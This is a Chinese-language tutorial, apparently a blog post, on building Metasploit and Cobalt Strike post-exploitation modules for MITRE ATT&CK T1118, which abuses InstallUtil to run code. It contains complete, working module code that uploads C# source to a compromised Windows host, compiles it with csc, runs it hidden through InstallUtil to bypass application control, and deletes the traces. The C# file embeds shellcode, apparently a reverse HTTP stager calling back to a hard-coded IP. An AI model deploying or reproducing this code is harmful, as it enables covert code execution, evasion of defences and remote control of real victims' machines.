Metasploit后渗透模块编写ATT&CK-T1118

4

1.T1118

攻击者可以使用InstallUtil通过受信任的Windows实用工具代理代码执行。InstallUtil是一个命令行实用程序,通过执行.NET二进制文件中指定的特定安装程序组件,允许安装和卸载资源。(引用:MSDN InstallUtil)InstallUtil由Microsoft数字签名,位于Windows系统上的.NET目录中:C:\Windows\Microsoft.NET\Framework\v\InstallUtil.exe`C:\Windows\Microsoft.NET\Framework64\v\InstallUtil.exe`

通过在二进制文件中使用执行用属性装饰的类的属性,InstallUtil也可以用于绕过应用程序控制[System.ComponentModel.RunInstaller(true)]

2.T1118-POC

InstallUtil HelpText方法调用

4

1
2
3
4
5
6
7
第一步:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library T1118.cs
第二步:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /U /logfile= /logtoconsole=false T1118.dll

HelpText 调用:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /? T1118.dll

5

3.开始编写模块

思路流程:

由于t1118属于后渗透阶段,我们为其在获取session会话的时候进行以下操作

1.上传源代码。

2.csc编译dll

3.InstallUtil.exe调用加载dll

需要定义设置的参数:

1.本地C#源码

2.上传windows的路径

3.dotnet的版本

我们在/usr/share/metasploit-framework/modules/post/windows/和/usr/share/metasploit-framework/data/文件夹中新建一个文件夹本文命名为secist,在这个文件夹中用于存放关于att&ck相关的攻击模块。

然后新建一个ruby文件,为其命名为t1118.rb。

6

6

3.1 初始化模块

参考官方编写模块 https://github.com/rapid7/metasploit-framework/wiki/How-to-get-started-with-writing-a-post-module

定义初始化info信息

7

设置参数

1
2
3
4
OptString.new( 'RFILE', [false, '上传到windows路径','C:\\windows\\temp\\t1118.tmp' ]),
OptString.new('LFILE', [ true, '本地t1118.cs路径', ::File.join(Msf::Config.install_root, "data", "secist", "t1118", "t1118.cs") ]),
OptBool.new('CLEANUP_FILE', [ true, "清理文件", true]),
OptString.new('DOTNET_VERSION', [true, 'DotNet Version','v4.0.30319' ]),

定义使用run命令 执行的内容。

1
2
3
4
5
6
7
8
9
10
def run
begin
return 0 if session.type != "meterpreter"
print_good("模块T1118执行成功")
rescue ::Exception => e
print_status("Unable to execute: #{e.message}")
print_error("模块T1118执行失败")
return
end
end

3.2 定义本地文件和上传文件

定义remote_file和local_file 对 datastore[‘RFILE’]和 datastore[‘LFILE’]取值

1
2
3
4
5
6
7
8
9
10
11
12
13
def remote_file
if datastore['RFILE'].blank?
remote_name = File.basename(datastore['LFILE'])
else
remote_name = datastore['RFILE']
end

remote_name
end

def local_file
datastore['LFILE']
end

3.3 删除上传的源代码

1
2
3
4
def clean_file
print_status("Removing files...")
register_file_for_cleanup(datastore['RFILE'])
end

3.3定义cmd的命令

使用run_cmd 运行命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
def run_cmd(user_cmd,io=true)
cmd = "cmd /c #{user_cmd}"
begin
print_status("Executing '#{cmd}' on #{session.inspect}")
if io
res = cmd_exec(cmd)
if res
print_warning(res)
end
else
res = session.sys.process.execute(cmd, nil, {'Hidden' => true})
end
rescue ::Exception => e
print_error("Unable to execute: #{e.message}")
return
end
end

3.4上传文件和命令执行

该步骤为以下内容

1.上传本地的/usr/share/metasploit-framework/data/secist/t1118/t1118.cs文件到C:\windows\temp\t1118.tmp

2.使用csc.exe 对t1118.tmp 进行编译

3.使用InstallUtil对编译后的dll进行调用

4.删除源文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
    def run
begin
return 0 if session.type != "meterpreter"
rfile = remote_file()
lfile = local_file()
dotnet_version = datastore['DOTNET_VERSION']
base = 'C:\Windows\Microsoft.NET\Framework'

csc = base + '\\' + dotnet_version + '\\' + 'csc.exe'
installutil = base + '\\' + dotnet_version + '\\' + 'installutil.exe'

upload_file(rfile, lfile)


cmd = %Q(#{csc} /out:C:\\windows\\temp\\t1118.dll #{rfile})
print_status("Compiling...")
run_cmd(cmd)
#C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library T1118.cs


sleep(2)
cmd = %Q(#{installutil} /logfile= /LogToConsole=false /U C:\\windows\\temp\\t1118.dll")
#C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /U /logfile= /logtoconsole=false T1118.dll


print_status("Executing InstallUtil...")
run_cmd(cmd,false)
print_good("模块T1118执行成功")
sleep(2)
clean_file()
print_good("清理缓存成功")
rescue ::Exception => e
print_status("Unable to execute: #{e.message}")
print_error("模块T1118执行失败")
return
end
end

t1118整体加载模块初始设置

1

poc 运行后

2

poc 填入shellcode 运行后

xj

xj

demo演示

msft1118

4.完整代码

添加库路径/usr/share/metasploit-framework/lib/msf/core/post/windows.rb

1
require 'msf/core/post/windows/secist'

定义库文件/usr/share/metasploit-framework/lib/msf/core/post/windows/secist.rb

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
# -*- coding: binary -*-

module Msf
class Post
module Windows

module Secist

#上传文件
def remote_file
if datastore['RFILE'].blank?
remote_name = File.basename(datastore['LFILE'])
else
remote_name = datastore['RFILE']
end

remote_name
end

#本地文件
def local_file
datastore['LFILE']
end

#清理文件
def clean_file
print_status("Removing files...")
register_file_for_cleanup(datastore['RFILE'])
end

#运行cmd 命令
def run_cmd(user_cmd,io=true)
cmd = "cmd /c #{user_cmd}"
begin
print_status("Executing '#{cmd}' on #{session.inspect}")
if io
res = cmd_exec(cmd)
if res
print_warning(res)
end
else
res = session.sys.process.execute(cmd, nil, {'Hidden' => true})
end
rescue ::Exception => e
print_error("Unable to execute: #{e.message}")
return
end
end

end # secist
end # Windows
end # Post
end # Msf

模块文件 /usr/share/metasploit-framework/modules/post/windows/secist /t1118.rb

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
include Msf::Post::File
include Exploit::FileDropper
include Post::Windows::Secist
def initialize(info={})
super(update_info(info,
'Name' => 'InstallUtil (T1118) Windows',
'Description' => %q{
ATT&CK 模块编写 T1118 },
'License' => MSF_LICENSE,
'Author' => [ 'Secist-demon' ],
'References' => [ [ 'URL', 'https://attack.mitre.org/wiki/Technique/T1118' ],
[ 'URL', 'https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1118' ],
[ 'URL', 'https://gist.github.com/lithackr/b692378825e15bfad42f78756a5a3260' ],
[ 'URL', 'https://github.com/praetorian-code/purple-team-attack-automation/blob/master/modules/post/windows/purple/t1118.rb' ] ],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ]
))
register_options(
[
OptString.new( 'RFILE', [false, '上传到windows路径','C:\\windows\\temp\\t1118.tmp' ]),
OptString.new('LFILE', [ true, '本地t1118.cs路径', ::File.join(Msf::Config.install_root, "data", "secist", "t1118", "t1118.cs") ]),
OptBool.new('CLEANUP_FILE', [ true, "清理文件", true]),
OptString.new('DOTNET_VERSION', [true, 'DotNet Version','v4.0.30319' ]),
])
end


def run
begin
return 0 if session.type != "meterpreter"
rfile = remote_file()
lfile = local_file()
dotnet_version = datastore['DOTNET_VERSION']
base = 'C:\Windows\Microsoft.NET\Framework'

csc = base + '\\' + dotnet_version + '\\' + 'csc.exe'
installutil = base + '\\' + dotnet_version + '\\' + 'installutil.exe'

upload_file(rfile, lfile)
cmd = %Q(#{csc} /out:C:\\windows\\temp\\t1118.dll #{rfile})
print_status("Compiling...")
run_cmd(cmd)
sleep(2)
cmd = %Q(#{installutil} /logfile= /LogToConsole=false /U C:\\windows\\temp\\t1118.dll")
print_status("Executing InstallUtil...")
run_cmd(cmd,false)
print_good("模块T1118执行成功")
sleep(2)
clean_file()
print_good("清理缓存成功")
rescue ::Exception => e
print_status("Unable to execute: #{e.message}")
print_error("模块T1118执行失败")
return
end
end
end

T1118.cs

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
using System;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Net;
using System.Net.Sockets;
using System.Runtime.InteropServices;

/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
Step One:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:exeshell.exe exeshell.cs
Step Two:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe
See https://gist.github.comsubTee/0dc27475f141cc3a1b50 for details.
*/
namespace Exec
{
public class Program
{

public static void Main()
{
Console.WriteLine("Hello From Main...I Don't Do Anything");
//Add any behaviour here to throw off sandbox execution/analysts :)

}
}

[System.ComponentModel.RunInstaller(true)]
public class Sample : System.Configuration.Install.Installer
{
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
private static UInt32 MEM_RELEASE = 0x8000;

//The Methods can be Uninstall/Install. Install is transactional, and really unnecessary.
public override void Uninstall(System.Collections.IDictionary savedState)
{
//ShellCode.DoEvil();

byte[] buf = new byte[798] { 0xfc, 0xe8, 0x89, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xd2, 0x64, 0x8b, 0x52, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf0, 0x52, 0x57, 0x8b, 0x52, 0x10, 0x8b, 0x42, 0x3c, 0x01, 0xd0, 0x8b, 0x40, 0x78, 0x85, 0xc0, 0x74, 0x4a, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x8b, 0x58, 0x20, 0x01, 0xd3, 0xe3, 0x3c, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0x31, 0xc0, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf4, 0x03, 0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe2, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x58, 0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x86, 0x5d, 0x68, 0x6e, 0x65, 0x74, 0x00, 0x68, 0x77, 0x69, 0x6e, 0x69, 0x54, 0x68, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0x31, 0xff, 0x57, 0x57, 0x57, 0x57, 0x57, 0x68, 0x3a, 0x56, 0x79, 0xa7, 0xff, 0xd5, 0xe9, 0x84, 0x00, 0x00, 0x00, 0x5b, 0x31, 0xc9, 0x51, 0x51, 0x6a, 0x03, 0x51, 0x51, 0x68, 0x50, 0x00, 0x00, 0x00, 0x53, 0x50, 0x68, 0x57, 0x89, 0x9f, 0xc6, 0xff, 0xd5, 0xeb, 0x70, 0x5b, 0x31, 0xd2, 0x52, 0x68, 0x00, 0x02, 0x40, 0x84, 0x52, 0x52, 0x52, 0x53, 0x52, 0x50, 0x68, 0xeb, 0x55, 0x2e, 0x3b, 0xff, 0xd5, 0x89, 0xc6, 0x83, 0xc3, 0x50, 0x31, 0xff, 0x57, 0x57, 0x6a, 0xff, 0x53, 0x56, 0x68, 0x2d, 0x06, 0x18, 0x7b, 0xff, 0xd5, 0x85, 0xc0, 0x0f, 0x84, 0xc3, 0x01, 0x00, 0x00, 0x31, 0xff, 0x85, 0xf6, 0x74, 0x04, 0x89, 0xf9, 0xeb, 0x09, 0x68, 0xaa, 0xc5, 0xe2, 0x5d, 0xff, 0xd5, 0x89, 0xc1, 0x68, 0x45, 0x21, 0x5e, 0x31, 0xff, 0xd5, 0x31, 0xff, 0x57, 0x6a, 0x07, 0x51, 0x56, 0x50, 0x68, 0xb7, 0x57, 0xe0, 0x0b, 0xff, 0xd5, 0xbf, 0x00, 0x2f, 0x00, 0x00, 0x39, 0xc7, 0x74, 0xb7, 0x31, 0xff, 0xe9, 0x91, 0x01, 0x00, 0x00, 0xe9, 0xc9, 0x01, 0x00, 0x00, 0xe8, 0x8b, 0xff, 0xff, 0xff, 0x2f, 0x58, 0x4c, 0x77, 0x41, 0x00, 0xf1, 0x72, 0x1c, 0xdc, 0x6a, 0x4a, 0x7d, 0x3b, 0x48, 0x25, 0xdd, 0xd0, 0x7d, 0xc5, 0x05, 0xed, 0xa2, 0x7d, 0x45, 0x28, 0x10, 0x9c, 0x8c, 0xb1, 0x4e, 0x60, 0x5b, 0xba, 0xa3, 0x59, 0x65, 0x6f, 0xc3, 0x23, 0x8a, 0x66, 0xe1, 0x0a, 0xa1, 0xb9, 0xc5, 0xba, 0xd9, 0xda, 0xb9, 0x3e, 0x44, 0xb2, 0x44, 0xf5, 0xac, 0x7b, 0x12, 0x7a, 0x72, 0xf0, 0xd9, 0x5c, 0xf1, 0x66, 0x46, 0xe8, 0x64, 0xe0, 0x95, 0xc5, 0x17, 0x2a, 0x8d, 0x85, 0xa1, 0xda, 0xfb, 0x00, 0x55, 0x73, 0x65, 0x72, 0x2d, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x3a, 0x20, 0x4d, 0x6f, 0x7a, 0x69, 0x6c, 0x6c, 0x61, 0x2f, 0x34, 0x2e, 0x30, 0x20, 0x28, 0x63, 0x6f, 0x6d, 0x70, 0x61, 0x74, 0x69, 0x62, 0x6c, 0x65, 0x3b, 0x20, 0x4d, 0x53, 0x49, 0x45, 0x20, 0x38, 0x2e, 0x30, 0x3b, 0x20, 0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x4e, 0x54, 0x20, 0x36, 0x2e, 0x31, 0x29, 0x0d, 0x0a, 0x00, 0x63, 0xbd, 0xd9, 0x1f, 0x5e, 0xec, 0x46, 0x7a, 0xf0, 0x58, 0x92, 0x00, 0x87, 0x53, 0x08, 0xb0, 0xc5, 0x3a, 0x3b, 0xc6, 0x8a, 0xde, 0x7e, 0xac, 0x96, 0xa4, 0x3d, 0x95, 0x9a, 0x3c, 0x13, 0x19, 0x93, 0x8a, 0x64, 0x3f, 0x06, 0x48, 0x7e, 0xe5, 0xe5, 0x5f, 0x68, 0x40, 0xd9, 0x67, 0x04, 0x95, 0x6c, 0x1b, 0x1f, 0x25, 0xee, 0xdc, 0x01, 0x00, 0xe0, 0xca, 0xce, 0xd6, 0x5e, 0x7b, 0xd7, 0xe4, 0xc9, 0x0a, 0xde, 0xc0, 0x9c, 0xa6, 0xb5, 0xbc, 0x06, 0xd7, 0x86, 0xef, 0xf1, 0xf8, 0xa3, 0x51, 0x05, 0x5b, 0xd6, 0x2f, 0x19, 0x52, 0x77, 0x42, 0x09, 0x84, 0xe3, 0xc5, 0x1b, 0xf5, 0x1d, 0x0d, 0x73, 0x2d, 0x1b, 0x38, 0xcc, 0x08, 0xd6, 0x2f, 0x83, 0x4c, 0x51, 0x0a, 0x60, 0x46, 0x28, 0x66, 0x6e, 0xea, 0x53, 0x08, 0x99, 0x0a, 0x92, 0x68, 0x88, 0xd8, 0x41, 0x3e, 0x1c, 0x16, 0x1a, 0x46, 0x31, 0x8c, 0xe4, 0xa8, 0x8c, 0xc5, 0xe3, 0xf0, 0x9a, 0x07, 0x1e, 0x2c, 0x8c, 0x74, 0x24, 0x14, 0x26, 0xab, 0xed, 0xba, 0x0f, 0xc2, 0x80, 0xa5, 0xa5, 0x1b, 0xb3, 0x6c, 0xa0, 0x09, 0x55, 0xae, 0x66, 0xba, 0x95, 0x98, 0x0a, 0x7e, 0x6a, 0x6a, 0xc1, 0x03, 0x98, 0xc9, 0xfd, 0x4e, 0xde, 0x58, 0x20, 0x68, 0x6a, 0x87, 0xa7, 0xb8, 0xba, 0xf0, 0x31, 0x3a, 0x6a, 0x27, 0x81, 0xb5, 0x5b, 0x86, 0x7d, 0xb7, 0x08, 0x74, 0x53, 0x98, 0xb2, 0x59, 0x07, 0xe5, 0x1c, 0x85, 0xe9, 0x52, 0xef, 0x30, 0xfb, 0x16, 0xf4, 0xa1, 0xfc, 0x6a, 0x98, 0x19, 0x2a, 0x1e, 0xe1, 0x09, 0x3b, 0x39, 0x52, 0x4b, 0x91, 0x45, 0xb8, 0x74, 0xf2, 0x0f, 0xcf, 0xa9, 0xfa, 0x15, 0xc4, 0x5b, 0x47, 0xe7, 0x00, 0x68, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5, 0x6a, 0x40, 0x68, 0x00, 0x10, 0x00, 0x00, 0x68, 0x00, 0x00, 0x40, 0x00, 0x57, 0x68, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x93, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x01, 0xd9, 0x51, 0x53, 0x89, 0xe7, 0x57, 0x68, 0x00, 0x20, 0x00, 0x00, 0x53, 0x56, 0x68, 0x12, 0x96, 0x89, 0xe2, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0xc6, 0x8b, 0x07, 0x01, 0xc3, 0x85, 0xc0, 0x75, 0xe5, 0x58, 0xc3, 0xe8, 0xa9, 0xfd, 0xff, 0xff, 0x31, 0x39, 0x32, 0x2e, 0x31, 0x36, 0x38, 0x2e, 0x39, 0x30, 0x2e, 0x31, 0x37, 0x00, 0x66, 0x00, 0x00, 0x00 };

UInt32 funcAddr = VirtualAlloc(0, (UInt32)buf.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Marshal.Copy(buf, 0, (IntPtr)(funcAddr), buf.Length);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;

// prepare data

PROCESSOR_INFO info = new PROCESSOR_INFO();
IntPtr pinfo = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(PROCESSOR_INFO)));
Marshal.StructureToPtr(info, pinfo, false);

// execute native code

hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF);

// retrive data

info = (PROCESSOR_INFO)Marshal.PtrToStructure(pinfo, typeof(PROCESSOR_INFO));
Marshal.FreeHGlobal(pinfo);
CloseHandle(hThread);
VirtualFree((IntPtr)funcAddr, 0, MEM_RELEASE);
}

[DllImport("kernel32")]
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);

[DllImport("kernel32")]
private static extern bool VirtualFree(IntPtr lpAddress, UInt32 dwSize, UInt32 dwFreeType);

[DllImport("kernel32")]
private static extern IntPtr CreateThread( UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId );

[DllImport("kernel32")]
private static extern bool CloseHandle(IntPtr handle);

[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject( IntPtr hHandle, UInt32 dwMilliseconds );

[DllImport("kernel32")]private static extern IntPtr GetModuleHandle( string moduleName );

[DllImport("kernel32")]
private static extern UInt32 GetProcAddress( IntPtr hModule, string procName );

[DllImport("kernel32")]
private static extern UInt32 LoadLibrary( string lpFileName );

[DllImport("kernel32")]
private static extern UInt32 GetLastError();

[StructLayout(LayoutKind.Sequential)]
internal struct PROCESSOR_INFO
{
public UInt32 dwMax;
public UInt32 id0;
public UInt32 id1;
public UInt32 id2;
public UInt32 dwStandard;
public UInt32 dwFeature;

// if AMD
public UInt32 dwExt;
}

}
}

同样CS也是一样的写法和思路

下面为我已编写好的脚本演示

cst1118

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
# demonsec666
sub t1118 {
bupload($bid, $3['payloadfile']);
bmv($bid, "t1118.cs", $3['rfile']);
elog("已上传文件");
bexecute($bid, "C:\\Windows\\Microsoft.NET\\Framework\\".$3['dotnet_version']."\\csc.exe /out:".$3['rdll']." ".$3['rfile']);
elog("已生成文件");
bpause($bid, int(3000));
bexecute($bid, "C:\\Windows\\Microsoft.NET\\Framework\\".$3['dotnet_version']."\\InstallUtil.exe /U /logfile= /logtoconsole=false ".$3['rdll']);
elog("已执行文件");
bpause($bid, int(3000));
brm($bid, $3['rfile']);
elog("已删除缓存文件");
}

popup beacon_bottom {
menu "&ATT&CK" {
item "T1118"{
$bid = $1;
$dialog = dialog("T1118", %(rfile => "C:\\Windows\\Temp\\t1118.tmp" ,rdll => 'C:\\windows\\temp\\t1118.dll',dotnet_version => 'v4.0.30319'), &t1118);
drow_file($dialog, "payloadfile", "Payload:");
drow_text($dialog, "rfile", "上传远程路径:");
drow_text($dialog, "rdll", "生成dll路径:");
drow_text($dialog, "dotnet_version", "dotnet 版本:");
dbutton_action($dialog, "Go");
dialog_show($dialog);
}
}
}

参考链接:

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md#atomic-test-7---installutil-helptext-method-call

https://attack.mitre.org/techniques/T1218/004/

https://github.com/praetorian-code/purple-team-attack-automation/blob/master/modules/post/windows/purple/t1118.rb